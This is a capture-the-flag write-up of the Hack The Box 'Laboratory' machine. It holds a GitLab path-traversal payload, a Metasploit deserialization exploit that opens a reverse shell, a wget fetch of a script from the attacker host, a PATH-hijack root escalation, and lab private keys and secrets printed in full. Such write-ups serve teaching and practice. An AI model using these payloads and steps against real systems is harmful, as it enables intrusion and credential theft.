--- search: exclude: true --- # Laboratory Writeup ![](img/53.png) ## Introduction : Laboratory is an Easy Linux machine released back in November 2020. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory] → nmap -vvv -p- 10.10.10.216 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered Discovered open port 22/tcp on 10.10.10.216 Discovered open port 443/tcp on 10.10.10.216 Discovered open port 80/tcp on 10.10.10.216 [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory] → nmap -Pn -sCV -p 22,80,443 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 10:19 CEST Nmap scan report for 10.10.10.216 Host is up (0.037s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA) | 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA) |_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519) 80/tcp open http Apache httpd 2.4.41 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to https://laboratory.htb/ 443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: The Laboratory | ssl-cert: Subject: commonName=laboratory.htb | Subject Alternative Name: DNS:git.laboratory.htb | Not valid before: 2020-07-05T10:39:28 |_Not valid after: 2024-03-03T10:39:28 | tls-alpn: |_ http/1.1 Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.61 seconds ## **Part 2 : Getting User Access** Our nmap scan picked up port 80/443 and the domain names **laboratory.htb** and **git.laboratory.htb** so let's add it to our hosts file: [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory] → sudo -i [sudo] password for nothing: ┌──(root💀nowhere)-[~] └─# echo '10.10.10.216 laboratory.htb git.laboratory.htb' >> /etc/hosts ┌──(root💀nowhere)-[~] └─# exit [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory] → ping -c1 laboratory.htb PING laboratory.htb (10.10.10.216) 56(84) bytes of data. 64 bytes from laboratory.htb (10.10.10.216): icmp_seq=1 ttl=63 time=81.7 ms [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory] → ping -c1 git.laboratory.htb PING laboratory.htb (10.10.10.216) 56(84) bytes of data. 64 bytes from laboratory.htb (10.10.10.216): icmp_seq=1 ttl=63 time=35.7 ms Now let's visit it: ![](prg/53_001.png) We also find a few potential users: ![](prg/53_002.png) Now let's check out the git subdomain: ![](prg/53_004.png) We can register a test user and log into it (make sure the email address ends with **laboratory.htb**): ![](prg/53_005.png) Once our account is created we get access to the gitlab instance, and by clicking the Help tab we see that we are on a Gitlab Community Edition version 12.8.1 ![](prg/53_006.png) Here we see that there is only one repository which is owned by dexter: ![](prg/53_007.png) Now since we know the Gitlab edition, let's look for exploits to use: [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory] → searchsploit gitlab ----------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------- --------------------------------- GitLab - 'impersonate' Feature Privilege Escal | ruby/webapps/40236.txt GitLab 11.4.7 - RCE (Authenticated) (2) | ruby/webapps/49334.py GitLab 11.4.7 - Remote Code Execution (Authent | ruby/webapps/49257.py GitLab 12.9.0 - Arbitrary File Read | ruby/webapps/48431.txt Gitlab 12.9.0 - Arbitrary File Read (Authentic | ruby/webapps/49076.py Gitlab 6.0 - Persistent Cross-Site Scripting | php/webapps/30329.sh GitLab Community Edition (CE) 13.10.3 - 'Sign_ | ruby/webapps/49822.rb GitLab Community Edition (CE) 13.10.3 - User E | ruby/webapps/49821.sh Gitlab-shell - Code Execution (Metasploit) | linux/remote/34362.rb Jenkins Gitlab Hook Plugin 1.4.2 - Reflected C | java/webapps/47927.txt NPMJS gitlabhook 0.0.17 - 'repository' Remote | json/webapps/47420.txt ----------------------------------------------- --------------------------------- Shellcodes: No Results We could use the Authenticated Arbitrary File Read exploit, but there is an [report](https://hackerone.com/reports/827052) on hackerone that describes the intended path **CVE-2020-10977** , so let's follow it: ![](prg/53_008.png) First we create 2 projects, then we create an issue on projectA that contains the following payload inthe issue description: ![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd) ` ![](prg/53_009.png) Once that's done, we move the issue to projectB: ![](prg/53_010.png) And once the issue is moved, you will see that the passwd file is linked: ![](prg/53_011.png) Here's what we get: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin git:x:998:998::/var/opt/gitlab:/bin/sh gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh registry:x:993:993::/var/opt/gitlab/registry:/bin/sh gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh So now we verified that there was a Local File Inclusion, the hackerone report tells us that this can be leveraged to a RCE which exploits a deserialization vulnerability inside the **experimentation_subject_id** cookie. To do so we need to grab the **secrets.yml** file first with the following payload: ![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml) So we just edit the description of our issue and move it to the other project once we save the changes to grab the next file: ![](prg/53_012.png) ![](prg/53_013.png) ![](prg/53_014.png) Here's the secrets.yml file: # This file is managed by gitlab-ctl. Manual changes will be # erased! To change the contents below, edit /etc/gitlab/gitlab.rb # and run `sudo gitlab-ctl reconfigure`. --- production: db_key_base: 627773a77f567a5853a5c6652018f3f6e41d04aa53ed1e0df33c66b04ef0c38b88f402e0e73ba7676e93f1e54e425f74d59528fb35b170a1b9d5ce620bc11838 secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3 otp_key_base: db3432d6fa4c43e68bf7024f3c92fea4eeea1f6be1e6ebd6bb6e40e930f0933068810311dc9f0ec78196faa69e0aac01171d62f4e225d61e0b84263903fd06af openid_connect_signing_key: | -----BEGIN RSA PRIVATE KEY----- MIIJKQIBAAKCAgEA5LQnENotwu/SUAshZ9vacrnVeYXrYPJoxkaRc2Q3JpbRcZTu YxMJm2+5ZDzaDu5T4xLbcM0BshgOM8N3gMcogz0KUmMD3OGLt90vNBq8Wo/9cSyV RnBSnbCl0EzpFeeMBymR8aBm8sRpy7+n9VRawmjX9os25CmBBJB93NnZj8QFJxPt u00f71w1pOL+CIEPAgSSZazwI5kfeU9wCvy0Q650ml6nC7lAbiinqQnocvCGbV0O aDFmO98dwdJ3wnMTkPAwvJcESa7iRFMSuelgst4xt4a1js1esTvvVHO/fQfHdYo3 5Y8r9yYeCarBYkFiqPMec8lhrfmviwcTMyK/TBRAkj9wKKXZmm8xyNcEzP5psRAM e4RO91xrgQx7ETcBuJm3xnfGxPWvqXjvbl72UNvU9ZXuw6zGaS7fxqf8Oi9u8R4r T/5ABWZ1CSucfIySfJJzCK/pUJzRNnjsEgTc0HHmyn0wwSuDp3w8EjLJIl4vWg1Z vSCEPzBJXnNqJvIGuWu3kHXONnTq/fHOjgs3cfo0i/eS/9PUMz4R3JO+kccIz4Zx NFvKwlJZH/4ldRNyvI32yqhfMUUKVsNGm+7CnJNHm8wG3CMS5Z5+ajIksgEZBW8S JosryuUVF3pShOIM+80p5JHdLhJOzsWMwap57AWyBia6erE40DS0e0BrpdsCAwEA AQKCAgB5Cxg6BR9/Muq+zoVJsMS3P7/KZ6SiVOo7NpI43muKEvya/tYEvcix6bnX YZWPnXfskMhvtTEWj0DFCMkw8Tdx7laOMDWVLBKEp54aF6Rk0hyzT4NaGoy/RQUd b/dVTo2AJPJHTjvudSIBYliEsbavekoDBL9ylrzgK5FR2EMbogWQHy4Nmc4zIzyJ HlKRMa09ximtgpA+ZwaPcAm+5uyJfcXdBgenXs7I/t9tyf6rBr4/F6dOYgbX3Uik kr4rvjg218kTp2HvlY3P15/roac6Q/tQRQ3GnM9nQm9y5SgOBpX8kcDv0IzWa+gt +aAMXsrW3IXbhlQafjH4hTAWOme/3gz87piKeSH61BVyW1sFUcuryKqoWPjjqhvA hsNiM9AOXumQNNQvVVijJOQuftsSRCLkiik5rC3rv9XvhpJVQoi95ouoBU7aLfI8 MIkuT+VrXbE7YYEmIaCxoI4+oFx8TPbTTDfbwgW9uETse8S/lOnDwUvb+xenEOku r68Bc5Sz21kVb9zGQVD4SrES1+UPCY0zxAwXRur6RfH6np/9gOj7ATUKpNk/583k Mc3Gefh+wyhmalDDfaTVJ59A7uQFS8FYoXAmGy/jPY/uhGr8BinthxX6UcaWyydX sg2l6K26XD6pAObLVYsXbQGpJa2gKtIhcbMaUHdi2xekLORygQKCAQEA+5XMR3nk psDUlINOXRbd4nKCTMUeG00BPQJ80xfuQrAmdXgTnhfe0PlhCb88jt8ut+sx3N0a 0ZHaktzuYZcHeDiulqp4If3OD/JKIfOH88iGJFAnjYCbjqbRP5+StBybdB98pN3W Lo4msLsyn2/kIZKCinSFAydcyIH7l+FmPA0dTocnX7nqQHJ3C9GvEaECZdjrc7KT fbC7TSFwOQbKwwr0PFAbOBh83MId0O2DNu5mTHMeZdz2JXSELEcm1ywXRSrBA9+q wjGP2QpuXxEUBWLbjsXeG5kesbYT0xcZ9RbZRLQOz/JixW6P4/lg8XD/SxVhH5T+ k9WFppd3NBWa4QKCAQEA6LeQWE+XXnbYUdwdveTG99LFOBvbUwEwa9jTjaiQrcYf Uspt0zNCehcCFj5TTENZWi5HtT9j8QoxiwnNTcbfdQ2a2YEAW4G8jNA5yNWWIhzK wkyOe22+Uctenc6yA9Z5+TlNJL9w4tIqzBqWvV00L+D1e6pUAYa7DGRE3x+WSIz1 UHoEjo6XeHr+s36936c947YWYyNH3o7NPPigTwIGNy3f8BoDltU8DH45jCHJVF57 /NKluuuU5ZJ3SinzQNpJfsZlh4nYEIV5ZMZOIReZbaq2GSGoVwEBxabR/KiqAwCX wBZDWKw4dJR0nEeQb2qCxW30IiPnwVNiRcQZ2KN0OwKCAQAHBmnL3SV7WosVEo2P n+HWPuhQiHiMvpu4PmeJ5XMrvYt1YEL7+SKppy0EfqiMPMMrM5AS4MGs9GusCitF 4le9DagiYOQ13sZwP42+YPR85C6KuQpBs0OkuhfBtQz9pobYuUBbwi4G4sVFzhRd y1wNa+/lOde0/NZkauzBkvOt3Zfh53g7/g8Cea/FTreawGo2udXpRyVDLzorrzFZ Bk2HILktLfd0m4pxB6KZgOhXElUc8WH56i+dYCGIsvvsqjiEH+t/1jEIdyXTI61t TibG97m1xOSs1Ju8zp7DGDQLWfX7KyP2vofvh2TRMtd4JnWafSBXJ2vsaNvwiO41 MB1BAoIBAQCTMWfPM6heS3VPcZYuQcHHhjzP3G7A9YOW8zH76553C1VMnFUSvN1T M7JSN2GgXwjpDVS1wz6HexcTBkQg6aT0+IH1CK8dMdX8isfBy7aGJQfqFVoZn7Q9 MBDMZ6wY2VOU2zV8BMp17NC9ACRP6d/UWMlsSrOPs5QjplgZeHUptl6DZGn1cSNF RSZMieG20KVInidS1UHj9xbBddCPqIwd4po913ZltMGidUQY6lXZU1nA88t3iwJG onlpI1eEsYzC7uHQ9NMAwCukHfnU3IRi5RMAmlVLkot4ZKd004mVFI7nJC28rFGZ Cz0mi+1DS28jSQSdg3BWy1LhJcPjTp95AoIBAQDpGZ6iLm8lbAR+O8IB2om4CLnV oBiqY1buWZl2H03dTgyyMAaePL8R0MHZ90GxWWu38aPvfVEk24OEPbLCE4DxlVUr 0VyaudN5R6gsRigArHb9iCpOjF3qPW7FaKSpevoCpRLVcAwh3EILOggdGenXTP1k huZSO2K3uFescY74aMcP0qHlLn6sxVFKoNotuPvq5tIvIWlgpHJIysR9bMkOpbhx UR3u0Ca0Ccm0n2AK+92GBF/4Z2rZ6MgedYsQrB6Vn8sdFDyWwMYjQ8dlrow/XO22 z/ulFMTrMITYU5lGDnJ/eyiySKslIiqgVEgQaFt9b0U3Nt0XZeCobSH1ltgN -----END RSA PRIVATE KEY----- The part of the file we need here is the **secret_key_base** value. **secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3** Now that we have the secret key, we can basically leverage it to a Remote code execution, but instead of doing it manually, we're going to use metasploit: [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Laboratory] → msfconsole `:oDFo:` ./ymM0dayMmy/. -+dHJ5aGFyZGVyIQ==+- `:sm⏣~~Destroy.No.Data~~s:` -+h2~~Maintain.No.Persistence~~h+- `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:` ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/. -++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+- -~/.ssh/id_rsa.Des- `htN01UserWroteMe!- :dopeAW.Noo :is:TЯiKC.sudo-.A: :we're.all.alike'` The.PFYroy.No.D7: :PLACEDRINKHERE!: yxp_cmdshell.Ab0: :msf>exploit -j. :Ns.BOB&ALICEes7;: :---srwxrwx:-.` `MS146.52.No.Per: :<****script>.Ac816/ sENbove3101.404: :NT_AUTHORITY.Do `T:/shSYSTEM-.N: :09.14.2011.raid /STFU|wall.No.Pr: :hevnsntSurb025N. dNVRGOING2GIVUUP: :#OUTHOUSE- -s: /corykennedyData: :$nmap -oS SSo.6178306Ence: :Awsm.da: /shMTl#beats3o.No.: :Ring0: `dDestRoyREXKC3ta/M: :23d: sSETEC.ASTRONOMYist: /- /yo- .ence.N:(){ :|: & };: `:Shall.We.Play.A.Game?tron/ ```-ooy.if1ghtf0r+ehUser5` ..th3.H1V3.U2VjRFNN.jMh+.` `MjM~~WE.ARE.se~~MMjMs +~KANSAS.CITY's~-` J~HAKCERS~./.` .esc:wq!:` +++ATH` ` =[ metasploit v6.0.46-dev ] + -- --=[ 2135 exploits - 1139 auxiliary - 365 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 8 evasion ] Metasploit tip: Use help to learn more about any command msf6 > search gitlab 12.8.1 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/gitlab_file_read_rce 2020-03-26 excellent Yes GitLab File Read Remote Code Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/gitlab_file_read_rce msf6 > use 0 [*] No payload configured, defaulting to generic/shell_reverse_tcp msf6 exploit(multi/http/gitlab_file_read_rce) > show options Here we need to set the following options: msf6 exploit(multi/http/gitlab_file_read_rce) > set USERNAME test USERNAME => test msf6 exploit(multi/http/gitlab_file_read_rce) > set PASSWORD testtest PASSWORD => testtest msf6 exploit(multi/http/gitlab_file_read_rce) > set RHOSTS 10.10.10.216 RHOSTS => 10.10.10.216 msf6 exploit(multi/http/gitlab_file_read_rce) > set VHOST git.laboratory.htb VHOST => git.laboratory.htb msf6 exploit(multi/http/gitlab_file_read_rce) > set LHOST tun0 LHOST => tun0 msf6 exploit(multi/http/gitlab_file_read_rce) > set SSL TRUE [!] Changing the SSL option's value may require changing RPORT! SSL => true msf6 exploit(multi/http/gitlab_file_read_rce) > set RPORT 443 RPORT => 443 Then we run the exploit: msf6 exploit(multi/http/gitlab_file_read_rce) > exploit [*] Started reverse TCP handler on 10.10.14.13:4444 [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version. [*] Logged in to user test [*] Created project /test/hPWfWdX6 [*] Created project /test/fh8BzMaY [*] Created issue /test/hPWfWdX6/issues/1 [*] Executing arbitrary file load [+] File saved as: '/home/nothing/.msf4/loot/20210605164827_default_10.10.10.216_gitlab.secrets_584759.txt' [+] Extracted secret_key_base 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3 [*] NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read [*] Attempting to delete project /test/hPWfWdX6 [*] Deleted project /test/hPWfWdX6 [*] Attempting to delete project /test/fh8BzMaY [*] Deleted project /test/fh8BzMaY [*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.216:34148) at 2021-06-05 16:48:32 +0200 id uid=998(git) gid=998(git) groups=998(git) ls ls -lash total 8.0K 4.0K drwx------ 2 git root 4.0K Jul 2 2020 . 4.0K drwxr-xr-x 9 git root 4.0K Jun 5 05:52 .. pwd /var/opt/gitlab/gitlab-rails/working And there you go! We managed to get a reverse shell as the git user, now that we're here we see that we are inside the gitlab-rails/working directory, so let's run the **gitlab-rails console** command to get more information on the users: git@git:~/gitlab-rails/working$ gitlab-rails console gitlab-rails console -------------------------------------------------------------------------------- GitLab: 12.8.1 (d18b43a5f5a) FOSS GitLab Shell: 11.0.0 PostgreSQL: 10.12 -------------------------------------------------------------------------------- Loading production environment (Rails 6.0.2) Switch to inspect mode. From here we type the following: **user = User.find(1)** user = User.find(1) #<****User id:1 @dexter> Let's change dexter's password: **user.password = 'testtest'** user.password = 'testtest' "testtest" Then save it: **user.save!** user.save! Enqueued ActionMailer::DeliveryJob (Job ID: 23a1f04b-e090-47e5-8e6f-8bc0a4f515e2) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<****GlobalID:0x00007fb1bf9c1d78 @uri=# <****URI::GID gid://gitlab/User/1>> true Now that's done let's login as the dexter user: ![](prg/53_015.png) And we're logged in as the Dexter user! ![](prg/53_016.png) Now let's take a look at his SecureDocker project: ![](prg/53_017.png) And we found a private SSH key! let's use to to see if we can login via SSH: [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Laboratory] → cat id_rsa -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY----- [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Laboratory] → chmod 600 id_rsa [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Laboratory] → ssh dexter@laboratory.htb -i id_rsa The authenticity of host 'laboratory.htb (10.10.10.216)' can't be established. ECDSA key fingerprint is SHA256:XexmI3GbFIB7qyVRFDIYvKcLfMA9pcV9LeIgJO5KQaA. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'laboratory.htb,10.10.10.216' (ECDSA) to the list of known hosts. dexter@laboratory:~$ id uid=1000(dexter) gid=1000(dexter) groups=1000(dexter) dexter@laboratory:~$ ls user.txt dexter@laboratory:~$ cat user.txt 73XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to log onto the box as the dexter user and print out the user flag. ## **Part 3 : Getting Root Access** Now in order to privesc to the root user, let's get linpeas.sh on the box: [term1] [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Laboratory] → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh . [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Laboratory] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... [term2] dexter@laboratory:~$ which wget curl /usr/bin/wget /usr/bin/curl dexter@laboratory:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh --2021-06-05 15:08:55-- http://10.10.14.13:9090/linpeas.sh Connecting to 10.10.14.13:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 341863 (334K) [text/x-sh] Saving to: ‘/tmp/peas.sh’ /tmp/peas.sh 100%[======================================================================================================================================================>] 333.85K --.-KB/s in 0.1s 2021-06-05 15:08:55 (2.23 MB/s) - ‘/tmp/peas.sh’ saved [341863/341863] dexter@laboratory:~$ chmod +x /tmp/peas.sh dexter@laboratory:~$ /tmp/peas.sh ` ![](prg/53_018.png) Let it run, then scroll through the output, and you can see that there is a SUID binary in **/usr/local/bin/docker-security** : ![](prg/53_019.png) So let's make use of it: dexter@laboratory:~$ echo "/bin/bash" > chmod dexter@laboratory:~$ chmod +x chmod dexter@laboratory:~$ export PATH=$PWD:$PATH dexter@laboratory:~$ echo $PATH /home/dexter:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/snap/bin dexter@laboratory:~$ /usr/local/bin/docker-security root@laboratory:~# id uid=0(root) gid=0(root) groups=0(root),1000(dexter) root@laboratory:~# cat /root/root.txt 00XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get the root flag. ## **Conclusion** Here we can see the progress graph : ![](img/53_graph.png)